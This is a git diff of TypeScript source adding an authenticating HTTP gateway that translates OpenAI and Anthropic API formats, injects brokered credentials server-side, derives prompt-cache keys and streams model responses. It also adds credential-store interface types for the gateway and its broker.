corsHeaders, isAuthorized, json, resolvePeer, withCors } from "./http"; +import type { + AuthGatewayServerHandle, + AuthGatewayServerOptions, + AuthGatewayFormatModule as FormatModule, + AuthGatewayParsedRequest as ParsedFormatRequest, +} from "./types"; +import { DEFAULT_AUTH_GATEWAY_BIND } from "./types"; + +// ParsedFormatRequest / ParsedFormatOptions / FormatModule come from ./types. + +export type ModelResolver = (modelId: string) => Model<Api> | undefined; + +export interface AuthGatewayBootOptions extends AuthGatewayServerOptions { + /** Source of credentials. Caller wires this to a broker-backed AuthStorage. */ + storage: AuthStorage; + /** + * Resolve a client-requested model id to a pi-ai Model. Caller supplies + * this from a ModelRegistry (lives in `coding-agent` to avoid an inverse + * dependency in `pi-ai`). + */ + resolveModel: ModelResolver; + /** Optional supplier for `/v1/models` listing. Returns the full model array. */ + listModels?: () => Iterable<Model<Api>>; +} + +// `parseBind` lives in ../utils/parse-bind so the gateway and broker can't +// drift on accepted inputs (e.g. empty hostname, IPv6 brackets). + +const FORMAT_ROUTES: Record<string, { module: FormatModule; label: string }> = { + "/v1/chat/completions": { module: openaiChat, label: "openai-chat" }, + "/v1/messages": { module: anthropicMessages, label: "anthropic-messages" }, + "/v1/responses": { module: openaiResponses, label: "openai-responses" }, +}; + +// (passthrough fast-path removed — it bypassed pi-ai provider logic, in +// particular the Anthropic Claude-Code OAuth system-prompt prefix injection. +// Every request now takes the translate path so credential-specific request +// shaping always applies.) + +// Options the caller's wire format may carry but the resolved provider can't +// honour are dropped silently in `buildStreamOptions`. We used to 400 here +// (`Unsupported option: temperature for openai-codex-responses`), but every +// realistic client (llm-git, openai SDK, anthropic SDK) bakes some of these +// defaults in without knowing which model they'll resolve to. Failing loudly +// just turned that into per-call config hell. Silent strip is what the +// upstream provider would do anyway when it ignores extra fields. + +/** + * Derive a stable cache identity from the parts of the request that don't + * change turn-to-turn within a logical conversation: model id, system prompt, + * tool definitions, and the first message (the conversation seed). Codex-class + * backends only cache prefixes when an explicit `prompt_cache_key` is set; + * without one, two requests with the same prefix but different trailing + * messages don't coalesce. This bridges Anthropic-style clients (which signal + * caching via `cache_control` markers rather than an opaque key) to Codex's + * keyed model so cross-protocol caching "just works". + * + * Including the first message scopes the key to one logical conversation: + * two different chats with the same system prompt no longer share a cache + * bucket and can't trample each other's prefix-tree entries. + * + * Anthropic-backed requests ignore `sessionId`; the key is harmless there. + */ +function deriveSessionId(modelId: string, context: Context): string { + const parts: string[] = [modelId]; + if (context.systemPrompt && context.systemPrompt.length > 0) { + parts.push(context.systemPrompt.join("\n\n")); + } + if (context.tools && context.tools.length > 0) { + parts.push(JSON.stringify(context.tools)); + } + const first = context.messages?.[0]; + if (first) { + // Strip timestamp / provider metadata so the hash is stable across turns + // of the same conversation (omp re-stamps every parsed Message). role + + // content is what's actually on the wire. + parts.push(JSON.stringify({ role: first.role, content: first.content })); + } + const seed = parts.join("\u0000"); + const hex = new Bun.CryptoHasher("sha256").update(seed).digest("hex"); + // Format the leading 128 bits as a v4-shape UUID (8-4-4-4-12). Codex's + // `normalizeOpenAIResponsesPromptCacheKey` accepts ≤64 chars verbatim, so + // the 36-char UUID flows through unchanged. + return `${hex.slice(0, 8)}-${hex.slice(8, 12)}-${hex.slice(12, 16)}-${hex.slice(16, 20)}-${hex.slice(20, 32)}`; +} + +function buildStreamOptions(parsed: ParsedFormatRequest, api: Api, signal: AbortSignal): SimpleStreamOptions { + const opts: SimpleStreamOptions = { signal }; + const { options } = parsed; + // Codex backend rejects `temperature` / `top_p` (per-model defaults only), + // so we drop them silently for that one provider. Every other unsupported + // option is just ignored by `streamSimple` if the underlying provider + // doesn't honour it. + const isCodex = api === "openai-codex-responses"; + if (options.maxOutputTokens !== undefined) opts.maxTokens = options.maxOutputTokens; + if (options.temperature !== undefined && !isCodex) opts.temperature = options.temperature; + if (options.topP !== undefined && !isCodex) opts.topP = options.topP; + if (options.topK !== undefined) opts.topK = options.topK; + if (options.minP !== undefined) opts.minP = options.minP; + if (options.stopSequences !== undefined) opts.stopSequences = options.stopSequences; + if (options.presencePenalty !== undefined) opts.presencePenalty = options.presencePenalty; + if (options.frequencyPenalty !== undefined) opts.frequencyPenalty = options.frequencyPenalty; + if (options.repetitionPenalty !== undefined) opts.repetitionPenalty = options.repetitionPenalty; + if (options.metadata !== undefined) opts.metadata = options.metadata; + if (options.headers !== undefined) opts.headers = { ...(opts.headers ?? {}), ...options.headers }; + if (options.toolChoice !== undefined) { + opts.toolChoice = + typeof options.toolChoice === "object" ? { type: "tool", name: options.toolChoice.name } : options.toolChoice; + } + if (options.reasoning !== undefined) opts.reasoning = options.reasoning; + if (options.disableReasoning !== undefined) opts.disableReasoning = options.disableReasoning; + if (options.hideThinkingSummary !== undefined) opts.hideThinkingSummary = options.hideThinkingSummary; + if (options.serviceTier !== undefined) opts.serviceTier = options.serviceTier; + if (options.cacheRetention !== undefined) opts.cacheRetention = options.cacheRetention; + // Client-supplied `prompt_cache_key` wins; otherwise derive a stable + // key from the model + system + tools so prefix caching engages on + // Codex-class backends across turns of the same logical conversation. + opts.sessionId = options.promptCacheKey ?? deriveSessionId(parsed.modelId, parsed.context); + if (options.thinkingBudgets) { + opts.thinkingBudgets = { ...(opts.thinkingBudgets ?? {}), ...options.thinkingBudgets }; + } + if (options.explicitThinkingBudgetTokens !== undefined) { + // Mirror Rust's `resolve_thinking_budget`: explicit budget pins onto + // whichever effort the client requested (or High when unspecified) and + // ALSO sets the effort so providers that gate on `reasoning` actually + // surface the budget. + const effort = options.reasoning ?? Effort.High; + opts.thinkingBudgets = { + ...(opts.thinkingBudgets ?? {}), + [effort]: options.explicitThinkingBudgetTokens, + }; + opts.reasoning ??= effort; + } + // Fields that don't yet have a matching pi-ai `SimpleStreamOptions` slot. + // Surfaced once in debug logs so they show up when wiring a new provider, + // but NEVER widened into `options.extra` — every consumer would have to + // re-implement the typed parse to read them back out. + // TODO(pi-ai): land first-class fields and replace these blocks. + if ( + options.parallelToolCalls !== undefined || + options.previousResponseId !== undefined || + options.seed !== undefined || + options.logitBias !== undefined || + options.user !== undefined || + options.responseFormat !== undefined + ) { + logger.debug("auth-gateway dropped unsupported typed options", { + api, + parallelToolCalls: options.parallelToolCalls, + previousResponseId: options.previousResponseId, + seed: options.seed, + hasLogitBias: options.logitBias !== undefined, + user: options.user, + hasResponseFormat: options.responseFormat !== undefined, + }); + } + return opts; +} + +/** + * Classify an upstream / gateway-internal error into a status code and a + * provider-style error type tag. Used by `handleFormatEndpoint` / + * `handlePassthrough` to drive `route.module.formatError` so every wire + * format emits its native envelope shape. + */ +function classifyGatewayError(err: unknown): { status: number; type: string; message: string } { + const message = err instanceof Error ? err.message : String(err); + const lower = message.toLowerCase(); + + // Custom pi-ai errors may attach a numeric `status` property; honor it + // when present and pick the matching tag. + const statusProp = + typeof err === "object" && err !== null && typeof (err as { status?: unknown }).status === "number" + ? (err as { status: number }).status | 0 + : undefined; + if (statusProp !== undefined) { + if (statusProp === 401 || statusProp === 403) + return { status: statusProp, type: "authentication_error", message }; + if (statusProp === 429) return { status: 429, type: "rate_limit_error", message }; + if (statusProp >= 400 && statusProp < 500) return { status: statusProp, type: "invalid_request_error", message }; + if (statusProp >= 500) return { status: statusProp, type: "upstream_error", message }; + } + + if (err instanceof Error && err.name === "AbortError") return { status: 499, type: "request_aborted", message }; + if (lower.includes("aborted") || lower.includes("abortsignal")) { + return { status: 499, type: "request_aborted", message }; + } + if ( + lower.includes("401") || + lower.includes("403") || + lower.includes("unauthorized") || + lower.includes("forbidden") + ) { + return { status: 401, type: "authentication_error", message }; + } + if (lower.includes("429") || lower.includes("rate") || lower.includes("quota")) { + return { status: 429, type: "rate_limit_error", message }; + } + if (lower.includes("unsupported") || lower.includes("invalid")) { + return { status: 400, type: "invalid_request_error", message }; + } + return { status: 502, type: "upstream_error", message }; +} + +function clientClosedResponse(route: { module: FormatModule }): Response { + return route.module.formatError(499, "request_aborted", "client closed request"); +} + +function mirrorRequestAbort(req: Request): AbortController { + const controller = new AbortController(); + if (req.signal.aborted) { + controller.abort(req.signal.reason); + } else { + req.signal.addEventListener("abort", () => controller.abort(req.signal.reason), { once: true }); + } + return controller; +} + +// (handlePassthrough removed — see note above.) + +async function handleFormatEndpoint( + route: { module: FormatModule; label: string }, + bootOpts: AuthGatewayBootOptions, + req: Request, + peer: string, +): Promise<Response> { + const controller = mirrorRequestAbort(req); + if (controller.signal.aborted) return clientClosedResponse(route); + + let body: unknown; + try { + body = await req.json(); + } catch (error) { + if (controller.signal.aborted) return clientClosedResponse(route); + return route.module.formatError(400, "invalid_request_error", `Invalid JSON body: ${String(error)}`); + } + if (controller.signal.aborted) return clientClosedResponse(route); + + // All three supported wire formats put the model id on a top-level `model` + // field. Read it without running the full strict schema so the route can + // produce a coherent error envelope when the model id is missing. + const modelId = + typeof body === "object" && body !== null && typeof (body as { model?: unknown }).model === "string" + ? (body as { model: string }).model + : undefined; + if (!modelId) { + return route.module.formatError(400, "invalid_request_error", "Missing top-level `model` field"); + } + + const model = bootOpts.resolveModel(modelId); + if (!model) { + return route.module.formatError(404, "invalid_request_error", `Unknown model: ${modelId}`); + } + + // pi-ai's stream() does NOT consult AuthStorage — the caller (us) is + // expected to resolve the credential and pass it as `options.apiKey`. + // For OAuth providers this returns the access token (refreshed via the + // broker override on AuthStorage when needed). + let apiKey: string | undefined; + try { + apiKey = await bootOpts.storage.getApiKey(model.provider, undefined, { + modelId: model.id, + signal: controller.signal, + }); + } catch (error) { + if (controller.signal.aborted) return clientClosedResponse(route); + const classified = classifyGatewayError(error); + logger.warn("auth-gateway getApiKey threw", { provider: model.provider, peer, error: classified.message }); + return route.module.formatError(classified.status, classified.type, classified.message); + } + if (controller.signal.aborted) return clientClosedResponse(route); + if (!apiKey) { + return route.module.formatError( + 401, + "authentication_error", + `No credential available for provider ${model.provider}`, + ); + } + + // Parse + validate against the strict format schema, rebuild as omp's + // canonical Context, dispatch through pi-ai's streamSimple, encode the + // canonical event stream back to the inbound format. There is no + // passthrough fast-path — every request flows through pi-ai so that + // credential-specific request shaping (OAuth Claude-Code prefix, beta + // headers, codex websocket transport, …) always applies. + let parsed: ParsedFormatRequest; + try { + parsed = route.module.parseRequest(body, req.headers); + } catch (error) { + if (controller.signal.aborted) return clientClosedResponse(route); + const message = error instanceof Error ? error.message : String(error); + return route.module.formatError(400, "invalid_request_error", message); + } + // Merge gateway-captured passthrough headers under the parser's own + // captures. Parsers that set `options.headers` themselves win (they may + // have stripped or normalized values); the gateway's allow-list fills in + // anything they didn't touch. + { + const captured = captureRequestHeaders(req.headers); + parsed.options.headers = { ...captured, ...(parsed.options.headers ?? {}) }; + } + if (controller.signal.aborted) return clientClosedResponse(route); + + const streamOpts = buildStreamOptions(parsed, model.api, controller.signal); + streamOpts.apiKey = apiKey; + + logger.info("auth-gateway request", { + format: route.label, + model: parsed.modelId, + resolvedProvider: model.provider, + resolvedModel: model.id, + stream: parsed.stream, + peer, + }); + + let events: AssistantMessageEventStream; + try { + if (controller.signal.aborted) return clientClosedResponse(route); + events = streamSimple(model, parsed.context, streamOpts); + } catch (error) { + const classified = classifyGatewayError(error); + logger.warn("auth-gateway streamSimple threw", { format: route.label, error: classified.message, peer }); + return route.module.formatError(classified.status, classified.type, classified.message); + } + + if (!parsed.stream) { + try { + if (controller.signal.aborted) return clientClosedResponse(route); + const message = await events.result(); + if (message.stopReason === "aborted" || message.stopReason === "error") { + const errorMessage = + message.errorMessage ?? + (message.stopReason === "aborted" ? "Request was aborted" : "Upstream request failed"); + logger.warn("auth-gateway non-streaming failed", { + format: route.label, + reason: message.stopReason, + error: errorMessage, + peer, + }); + if (message.stopReason === "aborted") { + return route.module.formatError(499, "request_aborted", errorMessage); + } + const classified = classifyGatewayError(new Error(errorMessage)); + return route.module.formatError(classified.status, classified.type, errorMessage); + } + return json(200, route.module.encodeResponse(message, parsed.modelId)); + } catch (error) { + if (controller.signal.aborted) return clientClosedResponse(route); + const classified = classifyGatewayError(error); + logger.warn("auth-gateway non-streaming aborted", { + format: route.label, + error: classified.message, + peer, + }); + return route.module.formatError(classified.status, classified.type, classified.message); + } + } + if (controller.signal.aborted) return clientClosedResponse(route); + + const sseStream = route.module.encodeStream(events, parsed.modelId, parsed.options); + return new Response(sseStream, { + status: 200, + headers: { + "Content-Type": "text/event-stream; charset=utf-8", + "Cache-Control": "no-cache", + Connection: "keep-alive", + // Disable proxy buffering (nginx and ingress controllers honor this). + // Without it the SSE stream gets held until the buffer flushes, which + // stalls the long-thinking-budget calls we exist to support. + "X-Accel-Buffering": "no", + }, + }); +} + +/** + * Pi-native fast path: `POST /v1/pi/stream`. Accepts the canonical pi-ai + * `Context` directly (no wire-format round-trip) and emits a bandwidth-shrunk + * event stream matching `pi-agent`'s `streamProxy`. Skips the OpenAI / + * Anthropic / Responses translation layers — those exist to bridge foreign + * SDKs (llm-git, anthropic-sdk, openai-sdk), and bridging back to pi-native + * just to bridge forward again is wasted work. + * + * Every other gateway concern (bearer auth, model resolve, credential fetch, + * abort mirroring, codex temperature/topP strip, prefix-cache key derivation, + * Claude-Code OAuth shaping inside `streamSimple`) still applies — only + * `parseRequest`/`encodeResponse`/`encodeStream` differ from the format-endpoint + * path. + */ +async function handlePiNative(bootOpts: AuthGatewayBootOptions, req: Request, peer: string): Promise<Response> { + const controller = mirrorRequestAbort(req); + const aborted = (): Response => piNative.formatError(499, "request_aborted", "client closed request"); + if (controller.signal.aborted) return aborted(); + + let body: unknown; + try { + body = await req.json(); + } catch (error) { + if (controller.signal.aborted) return aborted(); + return piNative.formatError(400, "invalid_request_error", `Invalid JSON body: ${String(error)}`); + } + if (controller.signal.aborted) return aborted(); + + let parsed: piNative.PiNativeParsedRequest; + try { + parsed = piNative.parseRequest(body, req.headers); + } catch (error) { + if (controller.signal.aborted) return aborted(); + const message = error instanceof Error ? error.message : String(error); + return piNative.formatError(400, "invalid_request_error", message); + } + + const model = bootOpts.resolveModel(parsed.modelId); + if (!model) { + return piNative.formatError(404, "invalid_request_error", `Unknown model: ${parsed.modelId}`); + } + + let apiKey: string | undefined; + try { + apiKey = await bootOpts.storage.getApiKey(model.provider, undefined, { + modelId: model.id, + signal: controller.signal, + }); + } catch (error) { + if (controller.signal.aborted) return aborted(); + const classified = classifyGatewayError(error); + logger.warn("auth-gateway getApiKey threw", { provider: model.provider, peer, error: classified.message }); + return piNative.formatError(classified.status, classified.type, classified.message); + } + if (controller.signal.aborted) return aborted(); + if (!apiKey) { + return piNative.formatError( + 401, + "authentication_error", + `No credential available for provider ${model.provider}`, + ); + } + + // Build the SimpleStreamOptions actually handed to `streamSimple`. We + // trust the client's options (already allow-listed by `parseRequest`) and + // only inject server-controlled fields. The codex temperature/topP strip + // matches `buildStreamOptions` — Codex rejects them with a 400. + const streamOpts: SimpleStreamOptions = { ...parsed.options, apiKey, signal: controller.signal }; + if (model.api === "openai-codex-responses") { + delete streamOpts.temperature; + delete streamOpts.topP; + } + // Merge gateway-captured passthrough headers under the client's own + // headers — the client's values win when they collide. + const captured = captureRequestHeaders(req.headers); + streamOpts.headers = { ...captured, ...(streamOpts.headers ?? {}) }; + // Cache identity: explicit `sessionId` wins, then derive a stable key + // from model + system + tools + first message so Codex prefix caching + // engages on the same logical conversation across turns. + streamOpts.sessionId ??= deriveSessionId(parsed.modelId, parsed.context); + + logger.info("auth-gateway request", { + format: "pi-native", + model: parsed.modelId, + resolvedProvider: model.provider, + resolvedModel: model.id, + stream: parsed.stream, + peer, + }); + + let events: AssistantMessageEventStream; + try { + if (controller.signal.aborted) return aborted(); + events = streamSimple(model, parsed.context, streamOpts); + } catch (error) { + const classified = classifyGatewayError(error); + logger.warn("auth-gateway streamSimple threw", { format: "pi-native", error: classified.message, peer }); + return piNative.formatError(classified.status, classified.type, classified.message); + } + + if (!parsed.stream) { + try { + if (controller.signal.aborted) return aborted(); + const message = await events.result(); + if (message.stopReason === "aborted" || message.stopReason === "error") { + const errorMessage = + message.errorMessage ?? + (message.stopReason === "aborted" ? "Request was aborted" : "Upstream request failed"); + logger.warn("auth-gateway non-streaming failed", { + format: "pi-native", + reason: message.stopReason, + error: errorMessage, + peer, + }); + if (message.stopReason === "aborted") { + return piNative.formatError(499, "request_aborted", errorMessage); + } + const classified = classifyGatewayError(new Error(errorMessage)); + return piNative.formatError(classified.status, classified.type, errorMessage); + } + return json(200, { message }); + } catch (error) { + if (controller.signal.aborted) return aborted(); + const classified = classifyGatewayError(error); + logger.warn("auth-gateway non-streaming aborted", { format: "pi-native", error: classified.message, peer }); + return piNative.formatError(classified.status, classified.type, classified.message); + } + } + if (controller.signal.aborted) return aborted(); + + const sseStream = piNative.encodeStream(events); + return new Response(sseStream, { + status: 200, + headers: { + "Content-Type": "text/event-stream; charset=utf-8", + "Cache-Control": "no-cache", + Connection: "keep-alive", + "X-Accel-Buffering": "no", + }, + }); +} + +/** + * Snapshot of `GET /v1/usage` — `fetchUsageReports` already caches reports at + * a 5-minute per-credential TTL (with jitter, plus last-good fallback on + * failure) inside `AuthStorage`, so this handler is a thin wrapper that + * surfaces the same data to HTTP callers (notably the macOS usage widget). + */ +async function handleUsage(storage: AuthStorage, signal: AbortSignal): Promise<Response> { + const reports = (await storage.fetchUsageReports?.({ signal })) ?? []; + // Drop the heavy provider-specific `raw` payload — UI consumers only need + // `limits` + `metadata`. Match the broker's `/v1/usage` shape so a single + // client struct (Swift widget, llm-git, ...) works against either endpoint. + const trimmed = reports.map(({ raw: _raw, ...rest }) => rest); + return json(200, { generatedAt: Date.now(), reports: trimmed }); +} + +function handleModelsList(opts: AuthGatewayBootOptions): Response { + const list = opts.listModels ? Array.from(opts.listModels()) : []; + const data = list.map(model => ({ + id: model.id, + object: "model" as const, + owned_by: model.provider, + api: model.api, + })); + return json(200, { object: "list", data }); +} + +export function startAuthGateway(opts: AuthGatewayBootOptions): AuthGatewayServerHandle { + const bind = parseBind(opts.bind ?? DEFAULT_AUTH_GATEWAY_BIND); + const tokens = new Set<string>(opts.bearerTokens); + const version = opts.version; + + const server = Bun.serve({ + hostname: bind.hostname, + port: bind.port, + fetch: async (req): Promise<Response> => { + const url = new URL(req.url); + const pathname = url.pathname; + const peer = resolvePeer(req); + // CORS preflight is always answered without auth — browsers send + // preflights pre-authentication and a 401 here breaks the actual + // request before the bearer is ever attached. + if (req.method === "OPTIONS") { + return new Response(null, { status: 204, headers: corsHeaders(req) }); + } + try { + if (req.method === "GET" && pathname === "/healthz") { + return withCors(json(200, { ok: true, version }), req); + } + if (!isAuthorized(req, tokens)) { + logger.info("auth-gateway request unauthorized", { method: req.method, path: pathname, peer }); + return withCors(json(401, { error: "unauthorized" }), req); + } + + // Aggregated usage — backed by AuthStorage's 5-min per-credential cache. + // Same shape as the broker's `/v1/usage`, so widget/llm-git speak to either with the + // same client struct. + if (req.method === "GET" && pathname === "/v1/usage") { + return withCors(await handleUsage(opts.storage, req.signal), req); + } + + // Provider-format dispatch. + const formatRoute = FORMAT_ROUTES[pathname]; + if (formatRoute && req.method === "POST") { + return withCors(await handleFormatEndpoint(formatRoute, opts, req, peer), req); + } + + // Pi-native fast path. Same auth + provider plumbing as the + // foreign-wire routes, just without the wire-format translation. + if (req.method === "POST" && pathname === "/v1/pi/stream") { + return withCors(await handlePiNative(opts, req, peer), req); + } + + // Model catalog. + if (req.method === "GET" && pathname === "/v1/models") { + return withCors(handleModelsList(opts), req); + } + + // Route-table miss: no format module to defer to, so we emit a + // plain JSON 404 rather than guessing at a protocol-specific envelope. + return withCors(json(404, { error: `No route: ${req.method} ${pathname}` }), req); + } catch (error) { + logger.error("auth-gateway handler crashed", { + method: req.method, + path: pathname, + peer, + error: String(error), + }); + return withCors(json(500, { error: "internal error" }), req); + } + }, + // Max-out Bun's idle timeout. Long thinking-budget calls can sit idle + // for minutes before the first token arrives; the default kills them. + idleTimeout: 255, + }); + + const boundHost = server.hostname ?? bind.hostname; + const boundPort = server.port ?? bind.port; + return { + url: `http://${boundHost}:${boundPort}`, + port: boundPort, + hostname: boundHost, + close: async () => { + server.stop(true); + }, + }; +} diff --git a/packages/ai/src/auth-gateway/types.ts b/packages/ai/src/auth-gateway/types.ts new file mode 100644 index 000000000..34e5c4b3e --- /dev/null +++ b/packages/ai/src/auth-gateway/types.ts @@ -0,0 +1,134 @@ +import type { Effort } from "../model-thinking"; +import type { AssistantMessage, AssistantMessageEventStream, CacheRetention, Context, ServiceTier } from "../types"; + +/** + * Wire types for the omp auth-gateway. + * + * The gateway sits between unauthenticated clients (containerized omp, + * llm-git, …) and the broker. It accepts provider-format HTTP requests + * (OpenAI chat-completions / Anthropic messages / OpenAI Responses), + * dispatches them through pi-ai's `streamSimple()`, and translates the + * canonical event stream back to the matching wire format. The gateway + * injects `Authorization` server-side so clients never see access tokens. + */ + +/** Default bind. Loopback-only — front with reverse proxy for remote access. */ +export const DEFAULT_AUTH_GATEWAY_BIND = "127.0.0.1:4000"; + +export type AuthGatewayToolChoice = "auto" | "none" | "required" | { name: string }; + +export interface AuthGatewayParsedRequestOptions { + // ── Sampling ────────────────────────────────────────────────────────── + maxOutputTokens?: number; + temperature?: number; + topP?: number; + topK?: number; + /** OpenAI nucleus-min sampling (`min_p`). */ + minP?: number; + /** Anthropic `stop_sequences` / OpenAI `stop`. */ + stopSequences?: string[]; + /** OpenAI `presence_penalty`. */ + presencePenalty?: number; + /** OpenAI `frequency_penalty`. */ + frequencyPenalty?: number; + /** OpenRouter / vLLM `repetition_penalty`. */ + repetitionPenalty?: number; + /** OpenAI deterministic-sampling `seed`. */ + seed?: number; + /** OpenAI `logit_bias` map (token id → bias). */ + logitBias?: Record<string, number>; + /** OpenAI `response_format` (text | json_object | json_schema). Opaque passthrough. */ + responseFormat?: unknown; + + // ── Tools ───────────────────────────────────────────────────────────── + toolChoice?: AuthGatewayToolChoice; + /** OpenAI `parallel_tool_calls`. */ + parallelToolCalls?: boolean; + + // ── Reasoning ───────────────────────────────────────────────────────── + /** Effort-level reasoning request (OpenAI Responses / Chat `reasoning_effort`). */ + reasoning?: Effort; + /** Force-disable reasoning (Anthropic `thinking: { type: "disabled" }`). */ + disableReasoning?: boolean; + /** + * Explicit Anthropic `thinking.budget_tokens`. Mirrors Rust's + * `resolve_thinking_budget`: pins onto whichever effort the client + * requested (defaulting to High when unspecified). Preferred over the + * removed legacy single-number `thinkingBudget` for new code. + */ + explicitThinkingBudgetTokens?: number; + /** Per-effort thinking budget map. */ + thinkingBudgets?: Partial<Record<Effort, number>>; + /** Suppress the provider's reasoning summary stream. */ + hideThinkingSummary?: boolean; + + // ── Service / routing ───────────────────────────────────────────────── + /** OpenAI service tier (auto|default|flex|scale|priority). */ + serviceTier?: ServiceTier; + /** Cache retention hint derived from inbound `cache_control` markers. */ + cacheRetention?: CacheRetention; + /** OpenAI Responses `prompt_cache_key`; bridges to pi-ai `sessionId`. */ + promptCacheKey?: string; + /** OpenAI Responses `previous_response_id` for response chaining. */ + previousResponseId?: string; + /** OpenAI / abuse-tracking `user` field. */ + user?: string; + + // ── Passthrough ─────────────────────────────────────────────────────── + /** + * Provider-specific metadata. Anthropic uses `metadata.user_id`; OpenRouter + * carries routing hints; xAI uses `search_parameters`; OpenAI accepts a + * free-form bag. The gateway forwards as-is. + */ + metadata?: Record<string, unknown>; + /** + * Captured allow-listed passthrough headers (anthropic-beta, + * anthropic-version, openai-organization, openai-project, openai-beta, + * x-stainless-*). Keys are lowercased. + */ + headers?: Record<string, string>; + /** + * Escape hatch for provider-specific request controls that don't yet have a + * first-class field. Prefer adding a typed field over widening this. + */ + extra?: Record<string, unknown>; +} + +export interface AuthGatewayParsedRequest { + modelId: string; + context: Context; + stream: boolean; + options: AuthGatewayParsedRequestOptions; +} + +export interface AuthGatewayFormatModule { + parseRequest(body: unknown, headers?: Headers): AuthGatewayParsedRequest; + encodeResponse(message: AssistantMessage, requestedModelId: string): Record<string, unknown>; + encodeStream( + events: AssistantMessageEventStream, + requestedModelId: string, + options?: AuthGatewayParsedRequestOptions, + ): ReadableStream<Uint8Array>; + /** + * Emit a protocol-specific error envelope. OpenAI returns + * `{ error: { message, type } }`; Anthropic returns + * `{ type: "error", error: { type, message } }`. + */ + formatError(status: number, type: string, message: string): Response; +} + +export interface AuthGatewayServerOptions { + /** Listen address. Default `127.0.0.1:4000`. */ + bind?: string; + /** Accept any of these bearer tokens. Empty allows unauthenticated calls. */ + bearerTokens: string[]; + /** Version surfaced on `/healthz`. */ + version?: string; +} + +export interface AuthGatewayServerHandle { + url: string; + port: number; + hostname: string; + close(): Promise<void>; +} diff --git a/packages/ai/src/auth-storage.ts b/packages/ai/src/auth-storage.ts index a05abaa1d..a40a3967b 100644 --- a/packages/ai/src/auth-storage.ts +++ b/packages/ai/src/auth-storage.ts @@ -3,9 +3,9 @@ * Handles loading, saving, refreshing credentials, and usage tracking. * * This module defines: - * - `AuthCredentialStore` interface: abstracting persistence (SQLite, memory, etc.) + * - `AuthCredentialStore` interface: persistence abstraction (SQLite, remote vault, …) * - `AuthStorage` class: credential management with round-robin, usage limits, OAuth refresh - * - `AuthCredentialStore`: concrete SQLite-backed implementation + * - `SqliteAuthCredentialStore`: concrete SQLite-backed implementation */ import { Database, type Statement } from "bun:sqlite"; import * as fs from "node:fs/promises"; @@ -78,6 +78,128 @@ export interface StoredAuthCredential { disabledCause: string | null; } +// ───────────────────────────────────────────────────────────────────────────── +// Auth Broker Snapshot Types +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Sentinel value placed in OAuth `refresh` fields when a credential is shared + * via {@link AuthStorage.exportSnapshot}. Refresh tokens never leave the broker; + * clients must call back to refresh. + */ +export const REMOTE_REFRESH_SENTINEL = "__remote__" as const; +export type RemoteRefreshSentinel = typeof REMOTE_REFRESH_SENTINEL; + +/** OAuth credential with refresh token replaced by the broker sentinel. */ +export type RemoteOAuthCredential = Omit<OAuthCredential, "refresh"> & { + refresh: RemoteRefreshSentinel; +}; + +/** Discriminated credential payload as published by the broker. */ +export type SnapshotCredential = ApiKeyCredential | RemoteOAuthCredential; + +export interface AuthCredentialSnapshotEntry { + id: number; + provider: string; + credential: SnapshotCredential; + identityKey: string | null; +} + +/** + * Wire-shaped snapshot exported by {@link AuthStorage.exportSnapshot} and + * served by the auth-broker server on `GET /v1/snapshot`. + */ +export interface AuthCredentialSnapshot { + generation: number; + generatedAt: number; + credentials: AuthCredentialSnapshotEntry[]; +} + +// ───────────────────────────────────────────────────────────────────────────── +// AuthCredentialStore interface +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Persistence abstraction consumed by {@link AuthStorage}. + * + * Concrete implementations: + * - {@link SqliteAuthCredentialStore} — local SQLite-backed store (default). + * - `RemoteAuthCredentialStore` from `./auth-broker` — client-side snapshot of + * a remote broker; mutating methods (`replace*`, `upsert*`, `delete*ForProvider`) + * throw because login flows route through the broker, not the client. + */ +export interface AuthCredentialStore { + close(): void; + listAuthCredentials(provider?: string): StoredAuthCredential[]; + updateAuthCredential(id: number, credential: AuthCredential): void; + deleteAuthCredential(id: number, disabledCause: string): void; + tryDisableAuthCredentialIfMatches(id: number, expectedData: string, disabledCause: string): boolean; + replaceAuthCredentialsForProvider(provider: string, credentials: AuthCredential[]): StoredAuthCredential[]; + upsertAuthCredentialForProvider(provider: string, credential: AuthCredential): StoredAuthCredential[]; + deleteAuthCredentialsForProvider(provider: string, disabledCause: string): void; + getCache(key: string, options?: { includeExpired?: boolean }): string | null; + setCache(key: string, value: string, expiresAtSec: number): void; + cleanExpiredCache(): void; + /** + * Optional store-supplied OAuth refresh. When present, `AuthStorage` uses + * it before the per-provider local refresh path. `RemoteAuthCredentialStore` + * implements this against the broker; SQLite stores leave it undefined. + * + * Precedence: `AuthStorageOptions.refreshOAuthCredential` > this hook > local. + * + * `signal` propagates the agent's cancel (ESC, request abort, …) all the + * way to the broker fetch so a hung connection can't strand the caller + * for `timeoutMs * (maxRetries + 1)`. + */ + refreshOAuthCredential?( + provider: Provider, + credentialId: number, + credential: OAuthCredential, + signal?: AbortSignal, + ): Promise<OAuthCredentials>; + /** + * Optional async pre-read hook invoked after AuthStorage selects a stored + * credential but before it returns that credential for an outbound request. + * Remote broker stores use this to wait out imminent rotations and refresh + * their local snapshot before the caller sees a stale access token. + */ + prepareForRequest?(credentialId: number, opts?: { signal?: AbortSignal }): Promise<boolean | undefined>; + /** + * Optional store-supplied aggregate usage fetch. When present, `AuthStorage` + * routes `fetchUsageReports()` here instead of fanning out per-credential. + * `RemoteAuthCredentialStore` proxies to the broker (whose datacenter IP + * isn't rate-limited like a heavy residential client). + * + * Precedence: `AuthStorageOptions.fetchUsageReports` > this hook > local fan-out. + * + * `signal` propagates the agent's cancel down to the broker fetch. + */ + fetchUsageReports?(signal?: AbortSignal): Promise<UsageReport[] | null>; + /** + * Optional store-supplied per-credential usage report lookup. When present, + * `AuthStorage` consults this before its own per-credential upstream fetch + * (`#getUsageReport`). `RemoteAuthCredentialStore` implements this against + * the broker's aggregate `/v1/usage` (one coalesced round-trip shared across + * all callers) so multi-credential ranking on the client never hits the + * upstream provider's rate-limited usage endpoint from the laptop IP. + * + * Returning `null` is authoritative — `AuthStorage` does NOT fall back to + * the local fetch path. The store hook owns the decision, since falling + * back would re-introduce the per-IP rate-limit problem the broker exists + * to avoid. + * + * `signal` propagates the agent's cancel down to the broker fetch. + */ + getUsageReport?(provider: Provider, credential: OAuthCredential, signal?: AbortSignal): Promise<UsageReport | null>; + /** + * Optional store hook to invalidate a specific credential after the upstream + * provider returned 401 on a supposedly-fresh key. Remote stores force the + * broker to re-issue the row; local stores can leave it undefined and let + * {@link AuthStorage.invalidateCredentialMatching} fall back to `reload()`. + */ + 